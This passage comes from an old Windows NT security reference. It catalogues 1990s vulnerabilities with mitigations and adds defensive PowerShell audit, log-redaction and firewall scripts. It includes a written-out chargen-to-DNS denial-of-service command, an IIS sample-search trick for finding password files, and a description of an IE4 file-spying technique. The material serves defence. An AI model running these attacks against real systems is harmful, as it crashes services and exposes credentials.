      Version 2.5 (current version) is vulnerable to a buffer overrun attack on the POP3 service. If the username supplied is too long, the service will fail with a memory exception. To the best of our knowledge, there are no current exploits which can cause remote execution, but given the characteristics of the failure, it seems entirely possible that this could occur. At the very least, it constitutes a denial of service which will require rebooting the server if attacked. We notified Seattle Lab of this problem two months ago, and they did not seem to understand the severity of the problem.
      Stopping the Problem:
      Upgrade to version 2.6

      [13.0.6] IE 4.0 and DHTML

      Found by Ralf Hueskes (ntsecurity.net)

      The Problem
      A dangerous security hole in Internet Explorer 4.0 was detected by Ralf Hueskes of Jabadoo Communications when he conducted a series of security tests for C'T computer magazine.
      His tests revealed that it is possible to spy on the contents of any text and HTML files on somebody else's computer. Not only local files are in danger, but also data on your company's intranet - even if it is protected by a firewall.
      The security hole exists even if users have activated the highest security level in their browser. The problem affects both the German and the English versions of Internet Explorer.
      The code needed for infiltrating your files can be hidden in any normal Web page or in an e-mail message.
      Technical Details
      The spy pages make use of JScript. If a user accesses a page or receives an e-mail containing this code, infiltration begins ...
      The spy page contains a so-called IFRAME sized 1 by 1 pixel. When a user accesses the page or opens the e-mail message, a small JScript program loads the HTML or text file to be spied on into this frame. The contents of the frame can then be read using Dynamic HTML and sent as a parameter hidden in a URL to any Web server on the Internet.
      Protective Measures
      According to Ralf Hueskes of Jabadoo Communications, the security hole exploits an error in the Internet Explorer 4.0 that can be fixed only by the manufacturer. Microsoft is aware of the problem and will make available a patch for download from
      http://www.microsoft.com/ie/ on October 17th 1997.
      Experienced users can protect themselves by completely deactivating the execution of Active Scripting in the security settings (menu item: Tools/Options/Security, Settings/Custom (for expert users)/Active Scripting/Disable) and by using the Security Zones feature in Internet Explorer 4.0.

      [13.0.7] 2 NT Registry Risks
      Found by David LeBlanc (ntsecurity.net)


      The Problem
      The attack was described most adequately in the ISS X-Force Security Advisory:
      ISS Security Alert
      October 21, 1997
      Scheduler/Winlogin Keys have Incorrect Permissions
      This advisory describes two similar configuration problems in the Windows NT Registry key permissions. These vulnerabilities can allow users with Server Operator privilege to increase their access level to Administrator.
      Problem 1: Scheduler Key Has Incorrect Permissions
      Affects: Windows NT
      Description: The HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Schedule key controls the schedule service. Server Operators have permission to write to this registry tree, which would allow them to manually schedule jobs to be run by the schedule service, which normally executes under the system user context. This can be used to raise the Server Operator's access level to Administrator.
      Risk: Medium
      Solution: Local Machine (GUI): From the Start menu, choose 'Run.' Type 'regedt32' and click 'OK.' This opens the Registry Editor. Through the Security menu, remove write access to the Schedule key for Server Operators.
      Problem 2: Winlogon Key Has Incorrect Permissions
      Affects: Windows NT
      Description: The HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsNT\CurrentVersion\Winlogon key has two values which can be used to cause a process to execute upon either system bootup, or when a user logs on. The programs pointed to by the System value run under the system user context after boot, and could be used to change a user's rights or access level. The UserInit value runs applications when a user logs in. The default settings for this key allow Server Operators to write these values, either of which could be used to raise a System Operator's access level to Administrator.
      Risk: Medium
      Solution: Local Machine (GUI): From the Start menu, choose 'Run.' Type 'regedt32' and click 'OK.' This opens the Registry Editor. Through the Security menu, remove write access to the Winlogon key for Server Operators.
      ================================
      Caution: Care must be taken when using the Registry Editor. If incorrect values are entered, the system may become inoperable. Should a mistake be made when editing the registry values, the registry state can be restored to the state at the last time the system booted up. For more information, see the Windows NT Help under the "Registry" section.

      ================================
      Acknowledgments: This problem was identified by David LeBlanc of ISS (dleblanc@iss.net).
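      Added example, not part of the ISS advisory or the MH DeskReference: an audit of the two keys named above for "Allow" entries that let Server Operators write to them, which is the condition both problems depend on. It assumes the full paths HKLM\SYSTEM\CurrentControlSet\Services\Schedule and HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon (the advisory abbreviates both), a modern Windows host, and an elevated PowerShell session; the Server Operators group only exists on domain controllers, so on a member server the audit simply reports nothing.

```powershell
# Added example (not from the ISS advisory): list Allow ACEs that give a principal
# write rights on the keys the advisory names. Paths are assumed; see the lead-in.
$auditedKeys = @(
    'HKLM:\SYSTEM\CurrentControlSet\Services\Schedule',
    'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'
)

# Any of these rights lets a principal change what the key controls.
$writeMask = [System.Security.AccessControl.RegistryRights]::SetValue -bor
             [System.Security.AccessControl.RegistryRights]::CreateSubKey -bor
             [System.Security.AccessControl.RegistryRights]::WriteKey -bor
             [System.Security.AccessControl.RegistryRights]::FullControl

function Get-RegistryWriteAce {
    param(
        [Parameter(Mandatory)][string]$Path,
        [string]$Principal = 'BUILTIN\Server Operators'
    )
    if (-not (Test-Path -LiteralPath $Path)) {
        Write-Warning "Key not present: $Path"
        return
    }
    foreach ($ace in (Get-Acl -LiteralPath $Path).Access) {
        # Only Allow entries for the principal that carry at least one write right
        if ($ace.AccessControlType -eq 'Allow' -and
            $ace.IdentityReference.Value -eq $Principal -and
            (($ace.RegistryRights -band $writeMask) -ne 0)) {
            [pscustomobject]@{
                Key       = $Path
                Principal = $ace.IdentityReference.Value
                Rights    = $ace.RegistryRights
                Inherited = $ace.IsInherited
            }
        }
    }
}

$findings = foreach ($key in $auditedKeys) { Get-RegistryWriteAce -Path $key }

if ($findings) {
    $findings | Format-Table -AutoSize
    Write-Host 'Remove these entries (regedt32, or Get-Acl/Set-Acl) so Server Operators cannot schedule jobs or set Winlogon values.'
} else {
    Write-Host 'Server Operators have no write access to the audited keys.'
}
```

      The same function serves for any other key and principal (for example, pass -Principal 'Everyone' against the Winlogon key); an entry marked Inherited has to be fixed on the parent key rather than on the key itself.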

      [13.0.8] Wingate Proxy Server
      Found by Bill Mattocks


      The Problem
      The attack was described most adequately by the person reporting it to us, Bill Mattocks:
      A recent hole has been discovered in the default security settings of a popular Windows 95 / Windows NT proxy server called WinGate, by Deerfield Communications:
      This bug was discovered by a 15-year-old hacker, Joshua E. Rodd, whose e-mail address is jerrod@ibm.net
      As a semi-well-known anti-spammer, I am active in the Usenet newsgroup known as news.admin.net-abuse.email. Recently, we anti-spammers came under attack by person or persons unknown, who was sending us a variety of hateful e-mail, seemingly from different dialup ISP ports around the world.
      I was fortunate enough to observe two such attacks in progress, and I telnetted to the IP addresses indicated by the headers on the e-mail messages. In each case, I was greeted by a "WinGate>" prompt, although the IP addresses were different.
      Apparently, a number of other anti-spammers got the same "hate" e-mail, and notified the ISP that the e-mail appeared to be coming from - in at least one case, a dialup user lost their access because of the complaints.
      Because I had seen a "WinGate" prompt at two different IP addresses where the attacks seemed to be originating from, I decided to do a little digging. I discovered that the text of the message contained some misspellings that were unusual. I used DejaNews to search for those misspellings, in conjunction with the word "WinGate." I thereby discovered young Mr. Rodd.
      He had discovered this bug, had written an exploit for it, and had written a netscanner which would comb a specified netblock looking for vulnerable WinGate hosts. He managed to find that if one telnets to a WinGate host that is not properly secured (which was, until a week or so ago, the default state of these servers), one could telnet into and then back out of the WinGate server, which would "launder" one's actual IP address. Thereafter, if one mounted an attack on another machine, or if one sent e-mail by "hijacking" an open SMTP server, one would seem to be coming from the location of the WinGate server. This exploit was used to harass anti-spammers with untraceable e-mail, but one could well imagine that it could be used for a variety of other attacks.
      It is easy to see that this type of IP laundering would be simpler to perform than IP spoofing, and nearly as bulletproof in terms of being untraceable.
      Joshua has, unfortunately, disseminated his hacking tools far and wide by now, as he was quite proud of his abilities.
      This information has been reported by C/Net news last week, and has been given to Deerfield Communications as well. Michael Deerfield is the CEO of the corporation, and he is quite concerned, but he is also understandably quite concerned about the potential publicity damage to his company. He was initially a bit hostile, posting messages in Usenet news to the effect that this type of "wide open" behaviour of his WinGate Proxy server was "by design," and was totally secure. He failed to immediately grasp that although the INTERIOR of the proxy server probably is safe from attack, the rest of the Internet is not safe from this exploit, which would result in fingers of blame being pointed back at his innocent clientele, and then eventually to WinGate.
      WinGate has indicated that this "bug," which they still claim is not a bug, has been repaired in the newest version of WinGate, v2.0. However, WinGate is available as shareware, and Deerfield Communications has estimated that there are hundreds of thousands of copies of the older software in circulation. Deerfield HAS placed simple instructions on disabling telnet on their web page, with a quick description of why a sysadmin would want to do so.

      This information has been reported to CERT at cert@cert.org, however, they have not responded at this time, and it has been nearly two weeks since I reported it. Vint Cerf has also been notified, and he assigned an MCI security person to look into it, and that person has not responded to me at this time, either (after an initial e-mail message, that is).
      As this is not an exploit designed to penetrate a network, nor is it a Denial of Service attack, I believe that many people are pooh-pooh'ing the incident, and I have heard comments to the effect that "all firewalls and proxy servers are like that." Perhaps so, but I only know of this one at this time.

      [13.0.9] O'Reilly Website uploader Hole
      Found by Herman deVette


      Systems running Website(c) with uploader.exe in place are vulnerable. Website ships with a program called UPLOADER.EXE that allows compatible Web clients to upload files to the Web server. Using the UPLOADER.EXE application with a modified HTML page will allow an attacker to upload any file the attacker wishes.

      The following is from Herman:
      "The program uploader.exe doesn't check anything at all. If you're lucky, you're running Windows NT and have put only "read/execute access" on CGI-WIN and other executable paths. Otherwise (win95) you have a real problem. You could create a CGI program, next you change the HTML file a little like this.
      Open the HTML file in your browser, select a nice CGI file to upload and run that CGI program remotely. (No need to tell you what this CGI program could do, could be .bat file too in one of Website's other CGI directories)"
      Herman de Vette
      To stop the problem, remove the uploader.exe application and transfer your files with FTP instead.

      [13.1.0] Exchange 5.0 Password Caching
      Found by Rajiv Pant


      Exchange 5.0 Server's POP3 service has a bug that causes the system not to flush cached passwords properly. Old passwords will continue to be valid along with newly set passwords. This problem will persist until the cache is flushed. David LeBlanc points out that Microsoft's FTP, HTTP, and Gopher services also suffer from the same problem. The problem does not affect NT logins themselves.
      To correct the problem, edit the following three values under this registry key:
      HKLM\System\CurrentControlSet\Services\MsExchangeIs\ParametersNetIf\Credentials
      Cache Age Limit (Default = 120 minutes)
      Cache Idle Limit (Default = 15 minutes)
      Cache Size (Default = 256 buckets)
      Set each of these values to 0.

      [13.1.1] Crashing NT using NTFS
      Found by Martin Stiemerling


      Affects NT systems running Service Pack 3 also.
      Recently, a program released from Germany (crashnt.exe) seems to be able to crash an NT server. The program was coded by Martin Stiemerling. It runs in a command window and takes one parameter, a drive letter (example: crash d:). It appears that the program may be derived from an NT defragmentation program. The fact that this program will crash and render an NTFS volume useless is spooky.
      David LeBlanc says he thinks this may be a result of something in the NtFsControlFile() function.

      [13.1.2] The GetAdmin Exploit
      Found by Konstantin Sobolev


      The GetAdmin program originated in Russia and has the ability to add users to the Administrators group. No special permissions are needed to execute the program, which interestingly runs through a telnet session as well. Microsoft released a patch that they said stops the attack. If, however, you run crash4.exe on the server first and then run GetAdmin, the exploit still works. (All of the executables discussed here are available in the tools section.)

      [13.1.3] Squid Proxy Server Hole
      Found by Fred Albrecht


      If someone FTPs into a site via a URL, the password the user enters could possibly be recovered from Netscape Communicator or from the logs of the Squid Proxy server (versions 1.1.10 and 1.1.11).
      -- Excerpt from ntsecurity.net
      Method for testing:
      1. Start NS Communicator 4.0
      2. Enter a URL of the form "ftp://user@host.domain.xxx"
      3. Communicator pops up a password entry dialog. Enter the password.
      4. When the file list is displayed in the browser window, follow the "Parent Directory" link
      5. Click the BACK button (seems to be optional in Linux)

      The password is now plainly visible in the URL field, similar to the following:
      "ftp://user:passwd@host.domain.xxx"
      We'll explain this a bit more clearly below:
      Normally, if a site allows anonymous FTP, this means you don't need a username and password pair to login. You just use "anonymous" and your email addr for the password and you're in - which is handled transparently by your browser when used for FTP access. But if the site is regulated, and requires a username password pair, then you'd be prompted by Communicator 4.0 if, and only if, you used Communicator to FTP to that protected site.
      Let's say you want to FTP to a site which is protected. You'd enter a URL like this: "ftp://yourname@ftp.someftpsite.com" - at which point Communicator connects to the site, and pops up a window asking you to enter the password that matches the "yourname" user account. You enter the password, click OK, and it sends it to the site for authentication. BUT, IT ALSO PUTS IT IN THE HISTORY FILE OF COMMUNICATOR in this format: "ftp://yourname:password@ftp.someftpsite.com".
      So you can see, in the beginning, the URL did not have the password included. But, once you enter the password using Communicator 4.0, it gets added to the URL and put in the history file.
      Therefore, anyone with access to your Communicator would have access to your history file, and thus, the stored passwords - should there be any.
      Be aware that it has been reported that JavaScript can access the history list, meaning a malicious Web page could be grabbing passwords from your browser without your knowledge.
      ALSO - it appears that the Squid Proxy Server is in fact writing the user's password in plain text to its own logs as well - which we should all know is a bad thing.
      Netscape says the root of the problem lies in the Squid Proxy, not Communicator.

      Stopping the Attack : Don't use Communicator for FTP'ing to sites that require a username and password. Use a standalone FTP client instead, until Netscape releases a fix.
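      Added example, not part of the ntsecurity.net write-up or the MH DeskReference: the proxy-side half of this problem (a password written in clear text to an access log) is a log-hygiene issue that outlives Squid 1.1.x, so the function below strips the secret from any "scheme://user:password@host" URL, in any scheme, before a line is stored or forwarded. The log lines are constructed for the demo and only imitate a proxy log format; the function names and the Squid log path in the comment are this example's assumptions.

```powershell
# Added example (not from ntsecurity.net or Squid): redact the password part of
# "scheme://user:password@host" URLs in log or history lines. Sample data constructed.

# Matches the userinfo form shown in the article; the secret stops at '@', '/', '?', '#' or whitespace.
$credentialUrl = '(?<scheme>[A-Za-z][A-Za-z0-9+.-]*://)(?<user>[^:/?#@\s]+):(?<secret>[^@/?#\s]+)@'

function Remove-UrlPassword {
    param([Parameter(Mandatory, ValueFromPipeline)][string]$Line)
    process {
        # Keep scheme and user name so the entry stays useful for troubleshooting;
        # replace only the secret. Single quotes keep ${...} for the .NET regex engine.
        [regex]::Replace($Line, $credentialUrl, '${scheme}${user}:REDACTED@')
    }
}

function Test-ContainsUrlPassword {
    # Detection side: true when a line still carries an embedded password.
    param([Parameter(Mandatory)][string]$Line)
    [regex]::IsMatch($Line, $credentialUrl)
}

# Constructed sample: two proxy-style log lines, the first with an embedded password.
$sampleLog = @(
    '874963205.123 1205 10.0.0.5 TCP_MISS/200 5120 GET ftp://user:s3cret@host.domain.xxx/pub/ - DIRECT/host.domain.xxx text/html',
    '874963206.456  310 10.0.0.5 TCP_HIT/200 2048 GET http://www.example.com/index.html - NONE/- text/html'
)

$sampleLog | ForEach-Object { "{0,-5} {1}" -f (Test-ContainsUrlPassword -Line $_), $_ }
$sampleLog | Remove-UrlPassword

# To scrub an existing file without touching the original (path assumed):
# Get-Content 'C:\squid\logs\access.log' | Remove-UrlPassword | Set-Content 'C:\squid\logs\access.redacted.log'
```

      Test-ContainsUrlPassword is the check to put in front of any log shipper or history export; Remove-UrlPassword is the fix to apply when it fires. Neither helps with the client-side half of the problem, where the history file itself must be protected.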

      [13.1.4] Internet Information Server DoS attack
      Found by Todd Fast
      You can crash an IIS box by sending a large URL to it (4-8K). --To Quote ntsecurity.net According to Microsoft personnel, "it's a very specific boundary condition when parsing the headers. The end of a token (method, URL, version or header) must be exactly at 8k, followed by a second token. Our max header buffer is 8k, anything beyond gets thrown out as an invalid request. In this particular scenario, an index gets misinterpreted as a pointer so we deref 0x00002000 which lo' and behold, doesn't exist."
      Stopping the Attack : Load the patch available from Microsoft.
       
      [13.1.5] Ping Of Death II
      Found By Jiva DeVoe


      In keeping with the tradition of the first ping of death, Ping Of Death II (or SPing) sends multiple 64k packets, which still become fragmented and will cause a Windows system to lock up completely.
      Stopping the Attack : Block all inbound ICMP traffic.

      [13.1.6] NT Server's DNS DoS Attack
      --From ntsecurity.net


      Microsoft DNS can be made to crash by redirecting the output of the Chargen service to the MS DNS service. A typical attack might be launched from a system using the following command:
      $ telnet ntbox 19 | telnet ntbox 53
      The above command is shown as seen on a UNIX command line. Once the command is issued, a telnet session is opened on port 19 (chargen) of the ntbox, and all output is redirected to a second telnet session opened on port 53 (dns) of the same ntbox. Launching the attack in this manner may subject the attacker to the same barrage of packets the DNS service will experience. But nonetheless, the attack is successful in crashing MS DNS.
      Stopping the Attack : Stopping the attack is done by performing one of the following:
      Don't run MS DNS until it's proven to be less bug-ridden. Instead, you may opt for running a free version of BIND for NT which is not subject to this attack. If you rely on MS DNS interoperating with WINS, you may opt for MetaInfo's DNS, which is a direct BIND port and works great in conjunction with WINS. If you must go on using MS DNS, be forewarned that it may be incredibly difficult to stop this attack, since it can be done through impersonation and by using non-standard ports for chargen.
      You can block port TCP port 53 using NT's built-in TCP/IP filtering. This stops zone transfers and TCP based name resolutions. This does not stop the UDP port 53 from continuing to operate normally. DNS normally relies on UDP for its name resolution transactions.
      Or, you can filter TCP port 53 on your routers to bordering networks, allowing only trusted secondary DNS servers to do zone transfers.
      Any one of the above three solutions should help you stop the attack cold.
      This type of attack (pointing chargen output to other ports) can go a long way towards bogging down lots of services, some of which die like MS DNS. You'd be well advised to disable NT's Simple TCP/IP Services (if installed) using Control Panel | Services. This stops the chargen, echo, daytime, discard, and quote of the day (qotd) services, any of which could be used for denial of service attacks. None of these services are required for proper network operation - although you should be aware that a few types of network monitors occasionally test the echo port when they cannot get a response using ping. If you find the need to run one or more of these services independent of the others, you can turn on/off each respective service by adjusting Registry entries found in the following subtree:
      HKEY_LOCAL_MACHINE\CurrentControlSet\Services\SimpTcp\Parameters
      By changing the established value of both the EnableTcpXXXX and EnableUdpXXXX parameters from 0x1 to 0x0, you effectively disable that particular service.
      The following parameters are available for adjustment:
      EnableTcpChargen
      EnableTcpDaytime
      EnableTcpDiscard
      EnableTcpEcho
      EnableTcpQotd
      EnableUdpChargen
      EnableUdpDaytime
      EnableUdpDiscard
      EnableUdpEcho
      EnableUdpQotd
      BE CAREFUL WHEN MAKING REGISTRY CHANGES, AS ERRORS CAN RENDER A SYSTEM NON-BOOTABLE.
      Keep in mind that this does not stop attacks that originate from other systems' chargen ports, nor will it stop impersonated port attacks.
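      Added example, not part of the ntsecurity.net article: the per-service switches above applied from PowerShell, setting each EnableTcp*/EnableUdp* parameter to 0 and then stopping and disabling the SimpTcp service, with a -WhatIf dry run so the change can be reviewed first. It assumes the full key path HKLM\SYSTEM\CurrentControlSet\Services\SimpTcp\Parameters (the article omits the SYSTEM hive), that the service is named SimpTcp, and an elevated session; -Keep leaves the named services enabled, for instance -Keep Echo when a monitor depends on the echo port as the article notes.

```powershell
# Added example (not from ntsecurity.net): disable NT's Simple TCP/IP services through the
# registry parameters the article lists. Key path and service name are assumptions.
$simpTcpParams  = 'HKLM:\SYSTEM\CurrentControlSet\Services\SimpTcp\Parameters'
$simpleServices = 'Chargen', 'Daytime', 'Discard', 'Echo', 'Qotd'

function Get-SimpleTcpState {
    # Current value of each EnableTcp*/EnableUdp* parameter, or nothing if not installed
    if (-not (Test-Path -LiteralPath $simpTcpParams)) { return }
    $names = $simpleServices | ForEach-Object { "EnableTcp$_"; "EnableUdp$_" }
    Get-ItemProperty -LiteralPath $simpTcpParams | Select-Object -Property $names
}

function Disable-SimpleTcpService {
    [CmdletBinding(SupportsShouldProcess)]
    param([string[]]$Keep = @())

    if (-not (Test-Path -LiteralPath $simpTcpParams)) {
        Write-Host 'Simple TCP/IP Services are not installed; nothing to do.'
        return
    }
    foreach ($svc in $simpleServices) {
        foreach ($proto in 'Tcp', 'Udp') {
            $name  = "Enable$proto$svc"
            $value = if ($Keep -contains $svc) { 1 } else { 0 }
            if ($PSCmdlet.ShouldProcess("$simpTcpParams\$name", "set to $value")) {
                Set-ItemProperty -LiteralPath $simpTcpParams -Name $name -Value $value -Type DWord
            }
        }
    }
    # The service reads these values when it starts, so restart it, or stop it
    # outright and disable it when nothing is being kept.
    if ($Keep.Count -eq 0) {
        if ($PSCmdlet.ShouldProcess('SimpTcp', 'stop and disable service')) {
            Stop-Service -Name SimpTcp -Force -ErrorAction SilentlyContinue
            Set-Service  -Name SimpTcp -StartupType Disabled
        }
    } elseif ($PSCmdlet.ShouldProcess('SimpTcp', 'restart service')) {
        Restart-Service -Name SimpTcp -ErrorAction SilentlyContinue
    }
}

Get-SimpleTcpState                   # state before the change
Disable-SimpleTcpService -WhatIf     # dry run: prints each change; drop -WhatIf to apply
```

      Run Get-SimpleTcpState again afterwards and confirm with a port scan from another host that 19/tcp and 19/udp no longer answer; as the article says, this removes one local source of chargen traffic and does nothing about chargen on other machines.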

      [13.1.7] Index Server Exposes Sensitive Material
      Found by Andrew Smith


      One of the components of Index Server (the search engine component that is part of Internet Information Server) can expose material of a highly sensitive nature. This component, webhits.exe, allows the web server to read files it would normally not be able to read. If the administrator of the server has left the default sample files on IIS, a hacker could easily narrow their searches for usernames and passwords. Once an intruder has located an IIS box that still has these default samples on the server, the intruder can use the sample search page to specify only files that have the word password in them and are script files.
      The URL the hacker would try is
      http://servername/samples/search/queryhit.htm then the hacker would search with something like "#filename=*.asp"
      When the results are returned, not only can one link to the files, one can also look at the "hits" by clicking the view hits link that uses the webhits program. This program bypasses the security set by IIS on script files and allows the source to be displayed.
      The default path to webhits.exe is:
      http://servername/scripts/samples/search/webhits.exe
      Stopping the Attack : Remove webhits.exe or move it from its default location.

      [13.1.8] The Out Of Band (OOB) Attack
      This is a DoS attack that affects NT and 95 machines alike.
      --To Quote ntsecurity.net


      How it Works:
      The attack is done by sending Out of Band (OOB) data to an established connection. NetBIOS, which listens on port 139 among others, seems to be the most affected - but the attack may work against MS-DNS running on port 53, causing massive Event Log entries related to "select() errors", as reported by David LeBlanc. Apparently the OS doesn't know how to handle OOB data properly, so it may panic, causing strange things to happen. NT displays the Blue Screen of Death (BSOD) indicating TCPIP.SYS as the culprit, and definitely requires a reboot after being attacked. Windows 95 may or may not crash completely, but always presents a blue exception screen, indicating MSTCP and NDIS as the culprits. Win95 always stops talking on the network after the attack.
      STOPPING THE ATTACK:
      Block inbound access to port 139 at your router. Alternatively you can stop the server service on NT systems, but this renders the box unable to share objects such as printers and directories. You may also use the built-in NT TCP/IP filtering to block non-local network access to port 139.
      In regards to Windows 95 machines, the only way right now to disable port 139 is to unload network drivers completely, or use a packet filter to block traffic to port 139 on that machine, as mentioned above.

      [13.1.9] SMB Downgrade Attack

      May 6, 1997 - 3pm CST [NTSD] - On the heels of April's RedButton exploit comes yet another demonstration of attacking NT networks. A new program has just been released, complete with source code, that will downgrade a Server Message Block (SMB) negotiation - the standard handshake that occurs when a client attempts to connect to an NT Server. Downgrading the authentication causes the client to send its password in clear text, unencrypted - Ouch. This has been a known possibility for quite some time, however no one has released a working program along with source code up until now.
      The program actually runs on a Windows based system loaded with Novell ODI style drivers running in promiscuous mode. Once active, the software listens for SMB negotiations, and upon detecting one, the software sends a single packet to the client instructing it to downgrade its connection attempt to a clear text level - at which point the client silently obeys by sending its password in clear readable text. Once this happens this little piece of software actually grabs the password as it travels over the wire and displays it on the screen. The client is successfully connected to the NT Server, and the user remains none-the-wiser that its password has just been grabbed.
      Under Windows networking, when a client creates a new connection to an NT Server, the clients can be instructed to use a particular authentication mechanism: clear-text or challenge/response. As a result, clients can be instructed to transmit their password in clear text form very easily.
      Furthermore, if an NT Server requested an encrypted login from the client, NT will authenticate the client, even if the client submits the password in clear text after being told to send an encrypted challenge/response answer. To make matters worse, there is no indication that this is taking place, and there is no way to provide an audit trail on the NT Server that indicates the clients are using clear-text passwords - even though the server has requested encrypted authentication. Perhaps NT should in fact be capable of logging an audit trail on this type of activity (hint hint).
      As a result of this design characteristic, a rogue client could sit on your network silently listening for username and password pairs traveling across the network during authentication. No physical access or user rights and permissions are required for this attack to work! All that's needed is a connection to your network between the clients and servers.
      As I said, this type of SMB downgrade attack has been a known possibility for quite some time - as noted in the Common Internet File System (CIFS) specification (section 8.5.2) - and similar, although not quite the same types of exploits have been demonstrated recently by various college students attempting to show vulnerabilities in Internet Explorer and Windows NT. Previously, NT LAN Manager negotiation and hostile SMB servers were shown to effectively initiate, intercept, or intervene in certain aspects of the client/server authentication process.
      The person bringing this new program to our attention, David Loudon, has suggested that, "Microsoft could initially create a server patch that would not allow the NT Server to accept clear text passwords. While this does not prevent the exposure of the clear-text password, at least the administrator would be alerted that clients were sending clear-text passwords when requested to send encrypted passwords. To completely resolve this issue, all Microsoft networking clients must be replaced with new code that would never send clear text passwords during the authentication process.
      "As long as Microsoft networking is enabled on any DOS, Windows 3.1, Windows for Workgroups, Windows 95, or Windows NT clients, users are susceptible to disclosing their clear text passwords to other devices on the physical network. Resolving this issue requires an administrator to update the Microsoft networking components on all affected desktops as soon as a fix is available from Microsoft."
      Microsoft is definitely aware of this issue, and it appears that this type of functionality was knowingly put in place in order to remain backward compatible with older Microsoft clients like DOS. As a result, don't expect to see a fix for this until Service Pack 3 comes out, and maybe even later.
      The new CIFS Authentication proposal seems to address this issue and a few other potential nasty security problems, but there is no guarantee the new CIFS specs will make it into SP3 yet. The probable outcome is that the new CIFS Authentication specification, which is being hashed out in a public forum on the Internet, will contain newfound configuration switches that can force the client and/or servers to require either clear text or encrypted negotiations.

      [13.2.0] RedButton
      --From ntsecurity.net

      A new program was released this weekend that allows ANYONE with remote access to an NT server (using ports 137, 138, and 139) to connect to that machine, read the registry, and create a new share accessible to the Everyone group. This is a SERIOUS problem that should be guarded against at all costs. A quick test of this new RedButton program shows that it does in fact connect to a remote NT system.
      Administrators should seriously consider blocking access to ports 137, 138, and 139 on any machines exposed to the Internet. You can also stop the Server service to protect yourself, although doing so eliminates the ability for that server to share resources.
      Another consideration is to edit the Registry as follows:
      1. Open HKEY_LOCAL_MACHINE/CurrentControlSet/Control/SecurePipeServers
      2. Create a key called winreg (if it doesn't exist)
      3. Set the security on it however you like, but don't give the Everyone group access - but don't define Everyone with NO ACCESS either as this locks out all accounts.
      4. Reboot the system
      RedButton was released by MWC, security consultants, who are maintaining a Web page about the new RedButton software at
      http://www.ntsecurity.com/redbutton. NOTE: This Web address is ntsecurity.com - not associated with NTSD or ntsecurity.net. We are not responsible for content at their site.
      RedButton will:
      * logon remotely to a target computer without presenting a username and password
      * gain access to the resources available to the Everyone group
      * determine the current name of built-in Administrator account
      * read several registry entries and display the information
      * list all shares - even hidden shares
      Microsoft released a HOTFIX for the RedButton problems on May 3, 1997. Be CERTAIN to read the Knowledge Base articles and README files in the distribution directory - this software hotfix installs itself without warning so be careful to understand it completely before proceeding.
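      Added example, not part of the ntsecurity.net article or MWC's RedButton page: registry steps 1 to 3 above done from PowerShell (create the winreg key and give it an explicit ACL that names Administrators and SYSTEM only, so Everyone has no entry at all rather than an explicit NO ACCESS), plus inbound host-firewall blocks for ports 137, 138 and 139, the mitigation both this section and [13.1.8] recommend. It assumes the full path HKLM\SYSTEM\CurrentControlSet\Control\SecurePipeServers (the article omits the SYSTEM hive), an elevated session, and the NetSecurity module of Windows 8 / Server 2012 or later; the choice of principals is this example's, not the article's.

```powershell
# Added example (not from ntsecurity.net or MWC): restrict remote registry access via the
# winreg key and block NetBIOS inbound at the host firewall. Key path is assumed.
$winregKey = 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg'

function Protect-RemoteRegistryKey {
    [CmdletBinding(SupportsShouldProcess)]
    param([string[]]$FullControl = @('BUILTIN\Administrators', 'NT AUTHORITY\SYSTEM'))

    if (-not (Test-Path -LiteralPath $winregKey)) {
        if (-not $PSCmdlet.ShouldProcess($winregKey, 'create key')) { return }
        New-Item -Path $winregKey -Force | Out-Null
    }
    $acl = Get-Acl -LiteralPath $winregKey
    # Stop inheriting from SecurePipeServers and drop every existing entry, then add ours,
    # so no Everyone entry can arrive from the parent.
    $acl.SetAccessRuleProtection($true, $false)
    foreach ($existing in @($acl.Access)) { $acl.RemoveAccessRuleAll($existing) }
    foreach ($who in $FullControl) {
        $rule = New-Object System.Security.AccessControl.RegistryAccessRule(
            $who, 'FullControl', 'ContainerInherit', 'None', 'Allow')
        $acl.AddAccessRule($rule)
    }
    if ($PSCmdlet.ShouldProcess($winregKey, "apply ACL for $($FullControl -join ', ')")) {
        Set-Acl -LiteralPath $winregKey -AclObject $acl
    }
    # Show the result; an entry naming Everyone here means the step did not take.
    (Get-Acl -LiteralPath $winregKey).Access |
        Select-Object IdentityReference, RegistryRights, AccessControlType
}

function Block-NetBiosInbound {
    [CmdletBinding(SupportsShouldProcess)]
    # Block rules beat allow rules, so scope RemoteAddress to what must be blocked
    # (a range, or a keyword such as LocalSubnet); 'Any' blocks every source.
    param([string]$RemoteAddress = 'Any')

    $ports = @(
        @{ Name = 'Block NetBIOS name service (UDP 137)'; Protocol = 'UDP'; Port = 137 },
        @{ Name = 'Block NetBIOS datagram (UDP 138)';     Protocol = 'UDP'; Port = 138 },
        @{ Name = 'Block NetBIOS session (TCP 139)';      Protocol = 'TCP'; Port = 139 }
    )
    foreach ($p in $ports) {
        if (Get-NetFirewallRule -DisplayName $p.Name -ErrorAction SilentlyContinue) { continue }
        if ($PSCmdlet.ShouldProcess($p.Name, 'create inbound block rule')) {
            New-NetFirewallRule -DisplayName $p.Name -Direction Inbound -Action Block `
                -Protocol $p.Protocol -LocalPort $p.Port -RemoteAddress $RemoteAddress -Profile Any | Out-Null
        }
    }
}

Protect-RemoteRegistryKey -WhatIf   # dry run; drop -WhatIf to apply
Block-NetBiosInbound -WhatIf
```

      The article's step 4 still applies: reboot after the ACL change so the remote registry service re-reads the key. The host firewall rules are defence in depth behind the router filtering the article asks for; a machine that must keep sharing files on the LAN should get a RemoteAddress that excludes that LAN rather than 'Any'.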

      [13.2.1] FrontPage WebBot Holes
      ---From ntsecurity.net

      Microsoft has uncovered a bug in the Microsoft FrontPage Server Extensions that allows knowledgeable users to potentially add content to pages on a Web site without permission through use of raw HTML. This can only happen if:
      Someone viewing a Web page has an advanced mastery of HTML
      The Web site is hosted on a server that contains the FrontPage server extensions
      A Web page contains a Save Results WebBot Component or a Discussion WebBot Component
      Since raw HTML is not filtered out of entries made in the entry fields of the Save Results or Discussion WebBot Components, it is possible for a knowledgeable person browsing a site to enter the tags necessary to create a form within these fields. If the results page is then fetched for browsing the newly inserted form will be available for use by anyone browsing the site. The result is that anyone browsing could then append information to pages in the Web site even though they do not have authoring permission.
